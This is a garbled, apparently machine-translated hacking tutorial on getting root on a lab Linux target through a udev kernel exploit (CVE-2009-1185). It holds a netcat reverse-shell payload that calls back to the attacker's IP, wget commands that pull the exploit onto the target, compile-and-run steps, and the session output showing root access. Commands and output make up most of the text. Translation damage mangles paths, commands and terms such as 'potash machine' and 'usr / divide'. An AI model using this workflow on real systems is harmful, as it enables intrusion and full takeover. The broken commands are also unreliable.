The root is considered the Holy Grail in the world of Linux exploitation. Similar to SYSTEM on Windows, the root account provides full administrative access to the operating system. Sometimes even a successful exploit only gives a low-level shell; In this case, a technique called privilege escalation can be used to gain access to more powerful accounts and to own the system completely.
Step 1: Collecting Information and Searching for Exploit
In a previous tutorial, we used metasploit to get a low-level shell on the target system by exploiting the shellshock vulnerability. What we ultimately want is root access, to do that we need to escalate privilege and break out of the limited shell.
We will use a kernel exploit to escalate privileges and get root, so first we need to find out some information about the target. Since we already have a shell, we can use the command uname -a to display kernel information about the system. The command lsb_release -a is also helpful to find out which distribution is running and which release information is available.
[*] Launched reverse TCP handler at 172.16.1.100:4444 [*] Stager Progress command - 100.46% done (1097/1092 bytes) [*] Send phase (36 bytes) to 172.16.1.102 [*] Command Shell Session 2 has been opened (220.127.116.11:4444 -> 172.16.1.102:49499) at 2018-07-16 13:55:15 -0500 I would uid = 33 (www data) gid = 33 (www data) Groups = 33 (www data) who am I www-data uname -a Linux metsploitable 2.6.24-16-server # 1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU / Linux lsb_release -a There are no LSB models available. Distributor ID: Ubuntu Description: Ubuntu 8.04 Release: 8.04 Codename: hardy
From here we can search for an exploit that we can use. The commands we just executed tell us that the target is Ubuntu 8.04 with kernel version 2.6.24. Kali contains a local version of Exploit-DB, a database containing several exploits, code, and publications. We can access it with a very useful tool called SearchSploit by executing the command searchsploit from the terminal.
root @ nullbyte: ~ # searchsploit privilege | grep -i linux | grep -i kernel | Grep 2.6 Linux kernel (Debian 9/10 / Ubuntu 14.04.5 / 16.04.2 / 17.04 / Fedora 23 | exploits / linux_x86 / local / 42276.c Linux Kernel 2.2.25 / 2.4.24 / 2.6.2 - & mremap () & # 39; Local Rights Escala | exploits / linux / local / 160.c Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege It | exploits / linux / local / 22362.c Linux Kernel 2.2.x / 2.4.x - Privileged Process Hijacking Privilege It | exploits / linux / local / 22363.c Linux kernel 2.4.1 <2.4.37 / 2.6.1 <2.6.32-rc5 - & # 39; pipe.c & # 39; Local Pr | exploits / linux / local / 9844.py Linux Kernel 2.4.32 / 2.6.0 -? Do_mremap () & # 39; Checked Privilege E | exploits / linux / local / 145.c Linux Kernel 2.4.30 / 18.104.22.168 - Bluetooth & # 39; bluez_sock_create & # 39; Local P | exploits / linux / local / 25289.c Linux Kernel 2.4.4 <22.214.171.124 / 2.6.0 <126.96.36.199 - & # 39; Sendpage & # 39; Local | exploits / linux / local / 19933.rb Linux kernel 2.4.x / 2.6.x (CentOS 4.8 / 5.3 / REHL 4.8 / 5.3 / SuSE 10 SP | uses / linux / local / 9545.c Linux Kernel 2.4.x / 2.6.x - & # 39; Bluez & # 39; BlueTooth signed Buffer Index Pri | exploits / linux / local / 926.c Linux Kernel 2.4.x / 2.6.x - & # 39; uselib () & # 39; Local Privileges Escalation (3) | exploits / linux / local / 895.c Linux Kernel 2.4.x / 2.6.x - Bluetooth Signed Buffer Index Privilege E | exploits / linux / local / 25288.c Linux Kernel 2.4 / 2.6 (Fedora 11) - & sock_sendpage () & # 39; s; Local rights | exploits / linux / local / 9598.txt Linux Kernel 2.4 / 2.6 (RedHat Linux 9 / Fedora Core 4 <11 / Whitebox | uses / linux / local / 9479.c Linux Kernel 2.4 / 2.6 (x86-64) - System Call Emulation Privilege Esca | exploits / linux_x86-64 / local / 4460.c Linux Kernel 2.4 / 2.6 - & sock_sendpage () & # 39; s; Local Privileges Escalation | exploits / linux / local / 9641.txt Linux Kernel 2.6 (Debian 4.0 / Ubuntu / Gentoo) UDEV <1.4.1 - Local | exploits / linux / local / 8478.sh Linux Kernel 2.6 (Gentoo / Ubuntu 8.10 / 9/04) UDEV <1.4.1 - Local Pr | exploits / linux / local / 8572.c Linux Kernel 2.6 <2.6.19 (White Box 4 / CentOS 4.4 / 4.5 / Fedorakor | exploits / linux_x86 / local / 9542.c Linux Kernel 2.6.0 <2.6.31 - & # 39; pipe.c & # 39; Local rights escalation (1 | exploits / linux / local / 33321.c Linux Kernel 2.6.10 <188.8.131.52 - & # 39; pipe.c & # 39; Local Privileges Escalation | exploits / linux / local / 40812.c
Since we are looking for a privileged escalation exploit, we are looking for privilege then use grep to direct our search into closer results Ignoring the case with the -i flag. In this example, we use the exploit 8572.c, which exploits a bug in the UDEV device manager and allows code execution through an unverified netlink message. Simply copy the location of the exploit and use the command locate to find the full path to the /usr/share/exploitdb/exploits/linux/local/8572.c . 19659007] root @ nullbyte: ~ # locate linux / local / 8572.c
root @ nullbyte: ~ #
This exploit is written in C (hence the extension .c), but we do not have to worry about the source code – it just gets executed once we've compiled it, but it does not , It hurts to get used to reading code to see exactly what it is doing. Now we can cat read this file to see information about this exploit as well as all developer hints.
* cve-2009-1185.c * * udev <1141 Local Privilege Escalation Exploit * Jon Oberheide
* http://jon.oberheide.org * * Information: * * http://cvmitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1185 * * udev before 1.4.1 does not check for a NETLINK message * From the kernel area, which allows local users to get permissions by sending * A NETLINK message from the user area. * * Remarks: * * An alternative version of kcope's exploit. This exploit uses the * 95 udev-spate.rules functionality that should execute arbitrary commands * when a device is removed. A little cleaner and more reliable, as long as you * Distro returns this rule file. * * Tested on Gentoo, Intrepid and Jaunty. * * Use: * * Pass the PID of the udevd netlink socket (listed in / proc / net / netlink, * normally the udevd PID minus 1) is argv . * * The exploit runs / tmp / run as root, so throw out your payload * 19659012 Step 2: Transfer exploit to target
To use this exploit, it must be on the target machine. The easiest way to accomplish this is to host the file on a local Apache server on our Kali machine, connect to the server from the target machine, and finally download the file. However, before we do that, some preparatory steps need to be taken.
First, we need to make sure the server is running and running on Kali, run service apache2 restart in the terminal. Next, we can do a symbolic link between the directory where the exploit is located and the directory that hosts files on the server; This will make the exploit available for download. Run the following command:
ln -s / usr / divide / exploitdb / exploits / linux / local / / var / www / html /
This exploit is executed from the / tmp directory on the target First we have to create the file that is executed. On Kali, enter nano / var / www / html / run and enter these lines in the file:
#! / bin / bash nc 172.16.1.100 4321 -e / bin / bash
When this file executes, it uses Netcat to connect to Kali's IP address on port 4321 and create a shell. Press Ctrl-X  Y and Enter to save.
Now you can upload the files to the destination. In our low-level shell, go to the / tmp directory and use the wget utility to connect to the server running on Kali and transfer the files to the destination computer.
cd / tmp wget http://172.16.1.100/run - 15: 18: 31-- http://172.16.1.100/run => Race & # 39; Connection to 172.16.1.100:80 ... connected. HTTP request sent, answer waiting ... 200 OK Length: 46 OK 100% 978.43 KB / s 15:18:31 (978.43 KB / s) - & # 39; run & # 39; saved [46/46] wget http://172.16.1.100/local/8752.c - 15: 19: 24 - http://172.16.1.100/local/8572.c => & # 39; 8572.c & # 39; 8572.c & # 39; Connection to 172.16.1.100:80 ... connected. HTTP request sent, answer waiting ... 200 OK Length: 2,876 (2.8K) [text/x-csrc] OK 100% 100.46 MB / s 15:19:24 (100.46 MB / s) - & # 39; 8572.c & # 39; saved [2876/2876]
Step 3: Compile and Run
Now that the files needed to run this exploit have been successfully transferred to our destination, we are almost ready to run. Since the exploit file is encoded in C, we need to compile it into a executable file. We will not go into the basics of compiled languages here, but basically there is source code that needs to be compiled to run. We can do this on Linux systems with GCC (GNU Compiler Collection).
Run the following command to compile the 8572.c exploit file into an executable file using the flag -o The output file:
gcc -o exploit 8572. c
If she complains that she can not find ld (the dynamic linker), we can use the flag -B to indicate where ld should be in / usr / bin, so:
gcc -b / usr / bin -o exploit 8572.c
Finally, we can use ls to successfully compile our executable file.
gcc -o exploit 8572.c collect2: Can & # 39; ld & # 39; not found gcc -B / usr / bin -o Exploit 8572.c ls 4674.jsvc_up 8572.c Exploit jVswA mhbkk run
The documentation for the 8572.c file states that we need to find the PID (process ID) of the netlink socket, which is usually the PID of the UDEVD process minus one. We can do this by executing cat / proc / net / netlink and the only non-zero PID should be the number we want. Check if this is correct by typing ps aux | Grep udev - it should be a number higher.
cat / proc / net / netlink sk Eth Pid Groups Rmem Wmem Dump Locks cell4800 0 0 00000000 0 0 00000000 2 cf87fa00 4 0 00000000 0 0 00000000 2 cd678000 7 0 00000000 0 0 00000000 2 cdc4bc00 9 0 00000000 0 0 00000000 2 cdc09c00 10 0 00000000 0 0 00000000 2 ce1bc400 15 0 00000000 0 0 00000000 2 cf8dee00 15 2459 00000000 0 0 00000000 2 CD394800 16 0 00000000 0 0 00000000 2 cd5f6200 18 0 00000000 0 0 00000000 2 ps aux | Grep udev Root 2460 0.0 0.2 2216 648? S <s 14:42 0:01 / sbinudevd --daemon
Next, we need to set up a listener on our potash machine so we can catch the shell while running the "run" script. Enter Kali nc -lvp 4321 to wait for incoming connections.
Now that our listener is open, we can finally take advantage of the target. Remember to pass NetID's PID argument, in this case 2459 but it could always be different. Run the following command in the child shell:
./ exploit 2459
After a few moments, a connection should reopen to our Netcat listener, and we can execute commands such as id . and whoami to display user information. We can see that we have reached root-level access, and from here we can basically do everything we want on the system.
root @ nullbyte: ~ # nc -lvp 4321 to listen [any] 4321 ... 172.16.1.102: Inverse host search failed: unknown host Link to [172.16.1.100] from (UNKNOWN) [172.16.1.102] 34418 I would uid = 0 (root) gid = 0 (root) who am I root
Cracking Password Hashes Next
In this tutorial, we learned how to use a kernel exploit to perform local authorization escalations and get root on the target. Now that we have full administrative access, we own the system. In the next part of this series, we'll find the password hashes and explore some of the tools they use to crack them.